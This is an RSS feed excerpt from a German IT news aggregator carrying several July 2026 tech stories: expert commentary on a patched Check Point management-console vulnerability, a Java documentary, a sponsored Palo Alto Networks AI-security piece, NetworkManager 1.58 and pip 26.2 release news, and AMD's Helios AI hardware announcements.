<p class="wp-block-paragraph">“This hits harder than your average CVE because of where it lives,” he said. “The CVE targets the SmartConsole login on Check Point’s Security Management Server, the console that pushes policy to every gateway underneath it. Popping a gateway gets you one lock picked. Popping the management server is more like finding the One Ring: one stolen token to rule every gateway it manages, no need to fight each one individually. The attacker can rewrite policy, open new VPN paths and kill the logging.”</p>



<p class="wp-block-paragraph">In an interview with CSO Online, <a href="https://www.linkedin.com/in/lotem-finkelstein-05797a85/" target="_blank" rel="noreferrer noopener">Lotem Finkelstein</a>, vice president of research at Check Point, said that the company learned of the vulnerability on Sunday, emailed customers the same day, and released the patch within 72 hours.</p>



<p class="wp-block-paragraph">But when his team re-reviewed earlier logs, knowing what to look for, they spotted this hole being attacked as early as April, Finkelstein said.</p>



<p class="wp-block-paragraph">The fact that, over the course of three months, the team only found ten organizations under attack, indicated that it has been very difficult for the attacker to find vulnerable systems, he noted; customers were, in the main, using secure settings to protect themselves.</p>



<p class="wp-block-paragraph">Nonetheless, Finkelstein said, Check Point considers this hole to be “a severe vulnerability.”</p>



<h2 class="wp-block-heading">Challenges of IP address restrictions</h2>



<p class="wp-block-paragraph">While it can be technically challenging to keep the IP address allowlists that Check Point recommends current, given DHCP’s ability to easily change those addresses, <a href="https://www.linkedin.com/in/assafmo/" target="_blank" rel="noreferrer noopener">Assaf Morag</a>, a cybersecurity researcher at Flare, noted that specifically limiting access to a management console is far more critical than limiting overall external access.</p>



<p class="wp-block-paragraph">“Implementing Trusted Clients as a per-IP allowlist is impractical,” he said, but that is not the case with restricting management access. “The more scalable solution is to restrict access based on trusted administrative network segments such as VPN pools, management VLANs, or jump hosts rather than maintaining lists of individual DHCP-assigned client addresses,” he explained. “That gives you the security benefit without creating a full-time administrative task. Maintaining allowlists for individual hosts is much more practical when those hosts have stable, predictable IP addresses, rather than dynamically assigned DHCP addresses.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/pieter-arntz-04164b2/" target="_blank" rel="noreferrer noopener">Pieter Arntz</a>, malware intelligence researcher at Malwarebytes, also noted that the constantly changing nature of global IP addresses can prove annoying to IT teams. Stressing that he is not familiar with Check Point’s specific settings, he noted, “Certain settings are a nuisance when applied strictly, and at some point the IT staff gets tired of constantly tweaking and they abandon the most secure path.”</p>



<h2 class="wp-block-heading">Ideal platform for long-term attacks</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security,  agreed that the severity and exposure of this hole is alarming.</p>



<p class="wp-block-paragraph">“This is exactly the kind of vulnerability that keeps CISOs awake at night because it strikes at the one system that is supposed to stand between the attacker and everything else. An authentication bypass that grants administrative control of a perimeter firewall isn’t just another CVE to patch. It’s an invitation for an adversary to rewrite the rules of the network itself,” he said. “The uncomfortable reality is that nobody runs a CrowdStrike agent on their firewall. Once an attacker owns an edge device, they gain a uniquely privileged position that often falls outside the visibility of traditional endpoint security, making it an ideal platform for persistence, credential theft, traffic manipulation, and long-term espionage.”</p>



<p class="wp-block-paragraph">IDC’s Dickson strongly encouraged CISOs to deploy the patch, not to just change settings to mitigate the issue. </p>



<p class="wp-block-paragraph">“Apply the actual hotfix,” he said. “Don’t just restrict Trusted Client IPs and call it done. That’s a stopgap, not a fix. Any internet-facing management console, Check Point or otherwise, is a five-alarm architecture problem independent of this CVE.”</p>



<p class="wp-block-paragraph">And, he added, “since attackers here can disable logging, audit admin activity going back before the bug surfaced. Quiet logs aren’t proof nothing happened. This is the recurring theme with ‘single pane of glass’ security tools: the console built to make everything easier to run is also the one thing you really don’t want someone else driving.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘The Java Story’ recounts the rise, fall, and rise again of Java]]></title>
<description><![CDATA[The evolution of Java is the subject of a just-released documentary about the programming language and development platform. “The Java Story: The Official Documentary” tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.



Produced...]]></description>
<link>https://tsecurity.de/de/3690140/ai-nachrichten/the-java-story-recounts-the-rise-fall-and-rise-again-of-java/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690140/ai-nachrichten/the-java-story-recounts-the-rise-fall-and-rise-again-of-java/</guid>
<pubDate>Thu, 23 Jul 2026 22:04:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The evolution of <a href="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html" data-type="link" data-id="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html">Java</a> is the subject of a just-released documentary about the programming language and development platform. <a href="https://inside.java/2026/07/18/the-java-documentary/">“The Java Story: The Official Documentary”</a> tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.</p>



<p class="wp-block-paragraph">Produced by <a href="https://www.youtube.com/@cultrepo">CultRepo</a> and sponsored by Oracle, JetBrains, IBM, and Azul, the documentary follows Java from its set-top box and browser-based origins at Sun Microsystems in the 1990s and through its rise to dominate server-side computing in the 2000s, the “dark ages” and resurgence with Java 8 under Oracle in the 2010s, and its continuing modernization and promising role in AI today. “From its humble beginnings as a project code-named ‘Oak’ at Sun Microsystems to becoming a global standard for enterprise software and billions of devices, Java’s journey is one of radical innovation, strategic pivots, and enduring community strength,” said Cult.Repo. </p>



<p class="wp-block-paragraph">The documentary also delves into Sun’s bitter Java licensing dispute with Microsoft, Oracle’s suit of Google over its use of Java APIs Android (Google won), the creation of the <a href="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html" data-type="link" data-id="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html">Java Community Process</a>, Sun’s open-sourcing of Java, and Oracle’s switch to the six-month release cycle. Technical enhancements such as lambda expressions in Java 8, virtual threads in Java 21 (<a href="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html" data-type="link" data-id="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html">Project Loom</a>), and the ongoing refactor to bring value objects to the Java object model (<a href="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html" data-type="link" data-id="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html">Project Valhalla</a>) also get attention. </p>



<p class="wp-block-paragraph">Technical experts and other Java figures interviewed in the documentary include James Gosling, creator of Java; Kim Polese, Java’s first product manager; Carla Schroer, director of Java compatibility at Sun Microsystems; James Duncan Davidson, creator of Apache Tomcat; Mark Reinhold, chief architect of the Java Platform Group at Oracle; Brian Goetz, Java language architect in the Java Platform Group at Oracle; Rod Johnson, creator of Spring; and Gavin King, creator of Hibernate. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 ways AI-driven defense is rewriting the cybersecurity playbook]]></title>
<description><![CDATA[The cybersecurity landscape has evolved beyond human scale. Today’s adversaries have replaced predictable, manual playbooks with machine-generated attack chains that can breach traditional controls in seconds. To bridge the gap, organizations must move past legacy, reactive controls and embrace a...]]></description>
<link>https://tsecurity.de/de/3690085/it-security-nachrichten/4-ways-ai-driven-defense-is-rewriting-the-cybersecurity-playbook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690085/it-security-nachrichten/4-ways-ai-driven-defense-is-rewriting-the-cybersecurity-playbook/</guid>
<pubDate>Thu, 23 Jul 2026 21:34:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The cybersecurity landscape has evolved beyond human scale. Today’s adversaries have replaced predictable, manual playbooks with machine-generated attack chains that can breach traditional controls in seconds. To bridge the gap, organizations must move past legacy, reactive controls and embrace a fundamentally different, AI-driven architecture: Agentic Endpoint Security (AES). </p>



<p class="wp-block-paragraph">AES represents a paradigm shift, moving security from a passive monitor to an active participant in the defense lifecycle. It provides the visibility and automated guardrails necessary to govern autonomous AI agents and agentic tools, ensuring that as your workforce scales with AI, your security posture remains unbreakable. </p>



<p class="wp-block-paragraph">With autonomous AI agents now capable of planning and executing multi-stage attacks at machine speed, the pressure on traditional security operations (SOC) has reached a breaking point. To survive this shift, the strategy is clear: we must fight AI with AI. </p>



<p class="wp-block-paragraph">Here is how AI-driven defense, pioneered by <a href="https://www.paloaltonetworks.com/cortex/cortex-xdr?utm_source=foundry-jg-amer-cortex-socf-ends&amp;utm_medium=display&amp;utm_campaign=foundry-cortex-edpxdr-amer-multi-discovery-en-foundry_cso_article_link_1_xdr&amp;utm_content=7014u000001AZlHAAW&amp;cq_plac=%7Bplacement%7D&amp;cq_net=%7Bnetwork%7D?dclid=CPXs7KK66ZUDFU6Q7gEdcAAphg&amp;gad_source=7&amp;gad_campaignid=24059812534" target="_blank" rel="noreferrer noopener">Cortex XDR</a> and the era of <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security?utm_source=foundry-jg-amer-cortex-socf-ends&amp;utm_medium=display&amp;utm_campaign=foundry-cortex-edpxdr-amer-multi-discovery-en-foundry_cso_article_link_2_koi&amp;utm_content=701Ki000000h8oXIAQ&amp;cq_plac=%7Bplacement%7D&amp;cq_net=%7Bnetwork%7D?dclid=CPSG_NS66ZUDFbrKuAgd4vAYrw&amp;gad_source=7&amp;gad_campaignid=24059814223" target="_blank" rel="noreferrer noopener">Agentic Endpoint Security</a>, is fundamentally rewriting the cybersecurity playbook.</p>



<ol class="wp-block-list">
<li><strong>From reactive patching to proactive prevention </strong></li>
</ol>



<p class="wp-block-paragraph">For decades, the industry lived in a “wait-and-see” mode waiting for a vulnerability to surface, waiting for a signature, and then rushing to patch the hole. But reactive methods just don’t hold up against modern “frontier” AI attacks that are constantly morphing. </p>



<p class="wp-block-paragraph">AI-driven defense changes the game by shifting to a prevention-first architecture. Rather than relying on historical signatures, modern platforms deploy localized, ML-driven analysis to evaluate the intent and behavior of an active process, stopping threats pre-execution. Cortex XDR leads with a strict prevention-first approach by using AI-driven local analysis and behavioral threat protection; the XDR agent stops sophisticated threats pre-impact and pre-execution. This proactive stance reduces the overall risk profile by blocking malicious chains of events in real time across network, process, file, and registry activity. </p>



<p class="wp-block-paragraph">2. <strong>Eliminating the “agentic blind spot” </strong></p>



<p class="wp-block-paragraph">As we all rush to adopt generative AI and automated workflows, a new gap has appeared: the “agentic blind spot.” Adversaries are now targeting AI assistants and automated scripts to bypass defenses. Since these digital agents often have deep access to enterprise data, a compromise here lets attackers move completely under the radar. </p>



<p class="wp-block-paragraph">The new playbook requires securing this entire ecosystem. By combining the distinct capabilities of Cortex XDR and Koi Security, organizations can effectively close this gap. Koi Agentic Endpoint Security tracks everything from shell commands to prompts in real time, while Cortex XDR adds a layer of defense that identifies and neutralizes behavioral anomalies unique to these automated threats. </p>



<p class="wp-block-paragraph">3. <strong>Machine-speed detection and “attack storylines” </strong></p>



<p class="wp-block-paragraph">When an attacker can move through your network in seconds, human-led teams can’t keep up. To make matters worse, most systems just flood analysts with low-quality, isolated alerts, leading to major burnout. </p>



<p class="wp-block-paragraph">AI-driven defense fixes the investigation process by automatically stitching separate data points into a single, high-fidelity “attack storyline.” Cortex XDR uses thousands of machine learning detectors across endpoint, network, and cloud sources to group related signals into one cohesive case. This reveals the full story of an attack, letting your analysts focus on fast remediation instead of digging through piles of data, reducing alert noise by up to 98%. </p>



<p class="wp-block-paragraph">4. <strong>Surgical and autonomous response </strong></p>



<p class="wp-block-paragraph">The final piece of the puzzle is moving from manual remediation to autonomous action. AI-driven response lets your SOC handle threats in minutes, not hours. The platform can automatically revoke compromised tokens or isolate endpoints at machine speed. </p>



<p class="wp-block-paragraph">Cortex XDR delivers built-in enterprise-grade automation at no additional cost, providing over 120 out-of-the-box playbooks and 18 quick actions to handle up to 99% of incidents without manual intervention. Crucially, this level of automation requires an unbreakable foundation of agent resilience. To ensure the defense cannot be disabled by an adversary, Cortex XDR is certified in both the AVC EDR Detection and Anti-Tampering tests, successfully blocking all attempts to disable or modify the agent. </p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">The threat landscape is changing faster than ever, driven by AI-powered attackers who exploit even the smallest gaps. But you don’t have to stay on the defensive. By shifting to a proactive, AI-driven architecture like the one built into Cortex XDR, you can stop threats before they happen, secure your agentic workflows, and automate away the noise that leads to analyst burnout. </p>



<p class="wp-block-paragraph">The journey to a more resilient, AI-powered SOC doesn’t have to be daunting. With the right foundation in place, you’re not just keeping pace with the new threat landscape; you’re staying one step ahead. It’s time to move beyond the old manual playbook and embrace the future of security operations. </p>



<p class="wp-block-paragraph">To learn more about Palto Alto Networks, visit <a href="https://www.paloaltonetworks.com/" target="_blank" rel="noreferrer noopener">https://www.paloaltonetworks.com</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetworkManager update advances IPv6-only support, Wi‑Fi management, and security for Linux-based operating systems]]></title>
<description><![CDATA[Networking is core to any operating system, and when it comes to Linux, it’s actually a combination of several key components. The Linux kernel handles the data plane, moving packets, and holding live device state. NetworkManager is the network configuration service, operating as the control plan...]]></description>
<link>https://tsecurity.de/de/3690083/it-security-nachrichten/networkmanager-update-advances-ipv6-only-support-wifi-management-and-security-for-linux-based-operating-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690083/it-security-nachrichten/networkmanager-update-advances-ipv6-only-support-wifi-management-and-security-for-linux-based-operating-systems/</guid>
<pubDate>Thu, 23 Jul 2026 21:34:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Networking is core to any operating system, and when it comes to Linux, it’s actually a combination of several key components. The Linux kernel handles the data plane, moving packets, and holding live device state. NetworkManager is the network configuration service, operating as the control plane, deciding what a device’s configuration should be.</p>



<p class="wp-block-paragraph"><a href="https://gitlab.freedesktop.org/NetworkManager/NetworkManager/-/releases/1.58.0">NetworkManager 1.58</a> was released this week, following more than five months of development and 407 commits since version 1.56. The release covers three areas: expanded support for IPv6-only networks, a set of Wi-Fi management updates, and a round of security hardening.</p>



<p class="wp-block-paragraph">IPv4 address exhaustion remains the pressure behind the first of those areas, pushing more networks toward IPv6-only operation every year.</p>



<p class="wp-block-paragraph">“More networks, mobile carriers, cloud providers, and anyone squeezed by IPv4 exhaustion are running IPv6-only by default,” <a href="https://www.linkedin.com/in/vanhoof/">Chris Van Hoof</a>, director of Linux engineering, platform enablement at Red Hat, told <em>Network World</em>.</p>



<h2 class="wp-block-heading">Advancing IPv6-only support</h2>



<p class="wp-block-paragraph">Dual stack networking, running IPv4 and IPv6 in parallel, has been the default IPv6 transition strategy for years. Dual stack networking, however, has a structural problem in that it still requires an IPv4 address on every device, so it does nothing to relieve address exhaustion pressure.</p>



<p class="wp-block-paragraph">An alternative model called IPv6-mostly addresses that gap. It is defined in RFC 8925, “IPv6-Only-Preferred Option for DHCPv4,” and lets capable clients drop IPv4 entirely while legacy hosts that still need it keep receiving it on the same network segment.</p>



<p class="wp-block-paragraph">“NetworkManager can also now auto-signal RFC 8925’s IPv6-only-preferred option, telling the network a host is fine skipping an IPv4 lease entirely,” Van Hoof said.</p>



<p class="wp-block-paragraph">For the traffic that still needs IPv4, NetworkManager 1.58 adds support for CLAT, short for customer-side translator. CLAT is the client-side half of 464XLAT, a mechanism defined in RFC 6877, “464XLAT: Combination of Stateful and Stateless Translation.”</p>



<p class="wp-block-paragraph">464XLAT pairs CLAT on the endpoint, which performs stateless header translation, with a stateful NAT64 translator on the provider side, letting IPv4-only apps keep functioning on a network that has no IPv4 of its own.</p>



<p class="wp-block-paragraph">“CLAT is the translation layer that lets legacy IPv4-only apps and services keep working on those networks without bolt-on middleware,” Van Hoof said.</p>



<h2 class="wp-block-heading">Wi-Fi management updates</h2>



<p class="wp-block-paragraph">NetworkManager 1.58 also brings a set of changes to how the daemon handles Wi-Fi connections and configuration.</p>



<ul class="wp-block-list">
<li><strong>Band selection: </strong>The band property of Wi-Fi connections now accepts a 6GHz value, and a Wi-Fi scan run through nmcli, NetworkManager’s command line tool, now shows each access point’s band as well.</li>



<li><strong>Credential handling:</strong> WPS credentials with a 64 character hex PSK are now accepted, matching what some access points return.</li>



<li><strong>Text interface improvements:</strong> nmtui, NetworkManager’s menu driven text interface, picked up several usability additions. A new device select button lets you choose a physical interface from a list instead of typing its name. The activation screen gained a rescan Wi-Fi button, and secret prompts now include a show password checkbox. There is also a share QR code option, mirroring the existing nmcli device wifi show-password command.</li>
</ul>



<h2 class="wp-block-heading">Security hardening</h2>



<p class="wp-block-paragraph">The release fixes vulnerabilities and tightens several defaults tied to DHCP handling and connection permissions.</p>



<ul class="wp-block-list">
<li><strong>CVE-2026-10805: </strong>Hostnames and MUD URLs are now validated before being written to the dhclient configuration file, rejecting characters that could alter the config syntax.</li>



<li><strong>DHCPv4 client fix: </strong>An out-of-bounds read in the internal DHCPv4 client, triggerable by an on-link attacker with a malformed UDP packet, has been fixed.</li>



<li><strong>Router option validation: </strong>The internal DHCPv4 client now ignores DHCP option 3, the Router option, when a lease also contains option 121, the Classless Static Route option, following the recommendation in RFC 3442.</li>



<li><strong>Permission checks and deprecations:</strong> For private connections that restrict access to specific users, NetworkManager now verifies that the user can access the referenced 802.1X certificates and keys.</li>
</ul>



<h2 class="wp-block-heading">Tunneling and automation updates</h2>



<p class="wp-block-paragraph">Two smaller but practical additions round out this release: a new tunnel type for virtualized networks, and a fix that closes a gap in how NetworkManager’s state survives a reboot.</p>



<p class="wp-block-paragraph">NetworkManager 1.58 also adds support for creating and managing GENEVE tunnel interfaces. GENEVE, short for Generic Network Virtualization Encapsulation, is a tunneling protocol that wraps Ethernet frames inside UDP packets, letting virtualized or overlay networks run on top of physical Layer 3 infrastructure. It shows up mainly in virtualization and cloud environments, where a hypervisor or container networking layer needs to build a virtual network segment across physical hosts. Previously, NetworkManager could not create or manage these interfaces directly.</p>



<p class="wp-block-paragraph">The release also adds persisted managed state. NetworkManager tracks whether it is responsible for a given network device, a setting called its managed state. Until now, that setting reset on every reboot, so provisioning tools had to reapply it each time a system restarted. NetworkManager 1.58 lets the managed state survive a reboot when it is set through nmcli or the D-Bus API.</p>



<p class="wp-block-paragraph">“It’s a small change but closes a real automation gap: Provisioning tools and cloud-init style workflows can set a device’s state once via D-Bus or nmcli and trust it survives a reboot, instead of reapplying config every time,” Van Hoof said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New pip flag fixes longstanding Python frustration]]></title>
<description><![CDATA[A new version of Python’s native package management tool, pip, will remove a limitation that has frustrated Python developers for years. If you wanted to install the dependencies for a given package, but not install the package itself, you were stuck. Either you had to extract the dependency list...]]></description>
<link>https://tsecurity.de/de/3690075/ai-nachrichten/new-pip-flag-fixes-longstanding-python-frustration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690075/ai-nachrichten/new-pip-flag-fixes-longstanding-python-frustration/</guid>
<pubDate>Thu, 23 Jul 2026 21:27:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A new version of Python’s native package management tool, pip, will remove a limitation that has frustrated Python developers for years. If you wanted to install the dependencies for a given package, but not install the package itself, you were stuck. Either you had to extract the dependency list from the package and install it by hand, or you had to build the whole package anyway.</p>



<p class="wp-block-paragraph">Why was this a problem? Sometimes, you want only the dependencies for a package—for instance, as a way to create a separate environment for testing or another project. If you’re <a href="https://github.com/pypa/pip/issues/8049#issuecomment-633845028">making source distributions via CI</a>, some requirements might be needed to make the source distribution but aren’t actually included in it (e.g., Cython). You would need to install these requirements somewhere—apart from the project itself—to perform the build step.</p>



<p class="wp-block-paragraph">A dependencies-only install mode for packages is a long-requested feature. Developer James O’Claire <a href="https://jamesoclaire.com/2026/07/23/pip-26-2-only-deps-solves-16-years-of-app-deployment-hacks/">found many examples</a> of such requests, along with various workarounds. Most of those involved third-party solutions of some sort.</p>



<p class="wp-block-paragraph">Now, a new feature set to land in <a href="https://github.com/pypa/pip/pull/13895">pip version 26.2</a> will fix this problem from the inside. The command <code>pip install --only-deps</code> will install only the dependencies for a given package. Note that it will not install build dependencies for the package, but only runtime dependencies.</p>



<p class="wp-block-paragraph">Note that you can accomplish this with existing third-party tools. For instance, <code>uv sync --no-install-project</code> has the same behavior. But having this functionality right inside pip means you don’t have to turn to external tooling—or ugly hacks—to solve the problem. This may be an example of how third-party projects like uv (<a href="https://www.infoworld.com/article/2336295/how-to-use-uv-a-superfast-python-package-installer.html" data-type="link" data-id="https://www.infoworld.com/article/2336295/how-to-use-uv-a-superfast-python-package-installer.html">a superfast Python package installer</a>) are inspiring native Python features where they make sense.</p>



<p class="wp-block-paragraph">pip 26.2 is scheduled to be released by the end of July 2026.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD raises the AI stakes with Helios, Venice and robotics]]></title>
<description><![CDATA[AMD executives took to the stage at its Advancing AI 2026 event in San Francisco today to detail the company’s next generation of AI infrastructure solutions, from Instinct MI455X AI accelerator GPUs and 6th Gen EPYC “Venice” CPUs, to Pensando networking, ROCm.AI software and its Helios rack-scal...]]></description>
<link>https://tsecurity.de/de/3690010/it-nachrichten/amd-raises-the-ai-stakes-with-helios-venice-and-robotics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690010/it-nachrichten/amd-raises-the-ai-stakes-with-helios-venice-and-robotics/</guid>
<pubDate>Thu, 23 Jul 2026 20:48:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AMD executives took to the stage at its Advancing AI 2026 event in San Francisco today to detail the company’s next generation of AI infrastructure solutions, from Instinct MI455X AI accelerator GPUs and 6th Gen EPYC “Venice” CPUs, to Pensando networking, ROCm.AI software and its Helios rack-scale platform that ties it all together.</p>



<p class="wp-block-paragraph">AMD has been working towards rack-scale AI system solutions for years. Its ZT Systems acquisition last year added valuable engineering talent and intellectual property that is now finally bearing the real fruits. Its <a href="https://www.amd.com/en/products/rackscale-solutions/helios.html" target="_blank" rel="noreferrer noopener">Helios AI platform</a> is a major platform evolution for AMD, with shipments scheduled to begin in the second half of this year (which is here and now).</p>



<p class="wp-block-paragraph">The announcements at Advancing AI show how the company has engineered its AI platform solutions for large reasoning models, sustained inference and agentic workflows. These workloads pressure memory capacity, data movement, networking and CPU orchestration. AMD’s approach is to keep as much data close to the compute engines as possible and move it more efficiently throughout the system, but there’s deeper nuance here that’s obvious versus AMD’s chief rival, NVIDIA.  </p>



<h2 class="wp-block-heading">AMD’s MI455X targets the AI memory wall</h2>



<p class="wp-block-paragraph">The Instinct MI455X GPU is the compute engine that fuels the Helios rack, and the first GPU based on AMD’s new CDNA 5 architecture. Built with a modular mix of 2nm and 3nm chiplets, it carries 432GB of HBM4 and 23.3TB/s of peak memory bandwidth.</p>



<p class="wp-block-paragraph">Compared to AMD’s current MI355X, <a href="https://hothardware.com/news/instinct-mi400-challenge-vera-rubin" target="_blank" rel="noreferrer noopener">the MI455X offers</a> 1.5 times the memory capacity, up to 2.9 times the peak memory bandwidth and up to four times the peak matrix performance with MXFP4 and MXFP8 data types, which are lower-precision numerical formats designed to accelerate AI processing while reducing memory demands. With MXFP6 (6-bit floating point), performance is rated at up to twice that of MI355X.</p>



<p class="wp-block-paragraph">AMD also shared some actual, measured internal results using production silicon. The company claims MI455X delivers 3.8 times higher FP8 decode performance, 3.5 times more measured FP4 compute performance and between 2.5 and 3.5 times more networking bandwidth than MI355X, depending on the transfer path tested. Those figures provide more context than just numerical specifications, though they remain AMD-provided comparisons that will need independent validation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/amd-generational-leap.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AMD Instinct chart showing generational leap in performance" class="wp-image-4200600" width="1024" height="547" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">AMD</p></div>



<p class="wp-block-paragraph">The architectural choices behind the numbers are important. Reasoning models and long context windows require sizeable KV caches for maintaining AI attention states, while mixture-of-experts models frequently move large amounts of data across accelerators. MI455X should let more model data, activation states and cache remain local. New dedicated IP in hardware can transfer data while the GPU continues processing, and expanded cache and multicast capabilities are designed to reduce redundant data movement to further improve efficiency.</p>



<p class="wp-block-paragraph">The aforementioned lower-precision formats can also raise throughput and reduce memory use, but model developers still have to determine where they can be applied without unacceptable accuracy loss.</p>



<h2 class="wp-block-heading">AMD’s Helios rack takes aim at Vera Rubin</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/amd-helios-rack.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AMD Helios rack" class="wp-image-4200601" width="1024" height="626" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Dave Altavilla</p></div>



<p class="wp-block-paragraph">Helios is AMD’s primary rack-scale competitor to NVIDIA’s Vera Rubin platform. Each liquid-cooled rack combines 72 MI455X GPUs, 18 single-socket Venice host CPUs and Pensando networking technologies.</p>



<p class="wp-block-paragraph">In its most complete, premium configuration, AMD rates Helios for 2.9 exaflops of low-precision AI compute, with 31TB of aggregate HBM4 capacity, 1.7PB/s of memory bandwidth, 260TB/s of bidirectional scale-up bandwidth and 43TB/s of scale-out bandwidth.</p>



<p class="wp-block-paragraph">These are formidable figures, but they are technical specifications rather than actual application benchmarks. The more consequential development is AMD’s move from collections of eight-GPU servers to a 72-GPU shared-memory domain. Models too large for one node can operate across the rack without treating every exchange as a scale-out networking transaction, which benefits large-model inference as well as training.</p>



<p class="wp-block-paragraph">AMD uses UALink over Ethernet, or UALoE, for an open standard scale-up fabric. Each MI455X provides 3.6TB/s of bidirectional scale-up bandwidth, while the complete rack delivers all-to-all connectivity through a single switch layer. AMD also claims six times more scale-out bandwidth per GPU than MI355X when MI455X is configured with three Pensando Vulcano 800 AI NICs.</p>



<p class="wp-block-paragraph">While open standards give cloud providers more control over suppliers and system design, AMD and its partners now have to prove those components can deliver the predictable performance, reliability and deployment experience customers expect from a tightly controlled, more vertically integrated platform.</p>



<p class="wp-block-paragraph">Finally, AMD designed Helios with automatic rerouting around failed links, virtual rack partitions, tray-level serviceability and rack-wide power, cooling and health monitoring. Major hyperscalers and potentially large-scale enterprise customers will likely key in on these capabilities, which can affect the availability, total cost and consistency of the AI services they consume.</p>



<h2 class="wp-block-heading">Kind of like cowbell, AMD Venice gives agentic AI more CPU</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/amd-epyc-venice-cpus.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Chart showing AMD EPYC CPU performance" class="wp-image-4200603" width="1024" height="515" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">AMD</p></div>



<p class="wp-block-paragraph">AMD’s agentic CPU messaging regarding its upcoming Venice-based EPYC processors is mostly marketing speak, but the underlying requirement is very real. An AI agent can invoke retrieval, databases, security checks, code execution and other tools before a GPU generates a response. Running many agents concurrently increases the amount of conventional compute requirements surrounding the accelerators.</p>



<p class="wp-block-paragraph">Venice scales to 256 Zen 6 cores with support for 512 threads, 16 memory channels, up to 1GB of L3 cache per socket, along with PCIe 6.0 and CXL 3.1 connectivity. AMD is also offering several Venice configurations for other applications, including general-purpose servers, high-frequency workloads, GPU hosts and high-density CPU sandbox systems used to execute agent tools.</p>



<p class="wp-block-paragraph">Treating the CPU solely as a GPU host understates its role. Gateways, tokenization, vector search, databases and short-lived code execution stress different mixes of per-core performance, thread count, memory bandwidth and I/O. Specifically, AMD’s internal testing shows Venice significantly outperforming its current EPYC 9965 Turin CPU across five parts of the agentic AI pipeline, including gateway processing, context assembly, vector search, enterprise applications and short-lived tool execution. Individual gains vary by workload, but AMD details the overall generational improvement at up to a 1.7 times lift. As with the MI455X figures though, these comparisons come from AMD and will require independent validation.</p>



<h2 class="wp-block-heading">Pensando networking and ROCm software advance</h2>



<p class="wp-block-paragraph">Keeping GPUs fed with data and coordinating traffic across racks directly affects utilization and operating costs. In fact, GPU utilization is a pretty sad state of affairs currently for some of the major frontier model providers.</p>



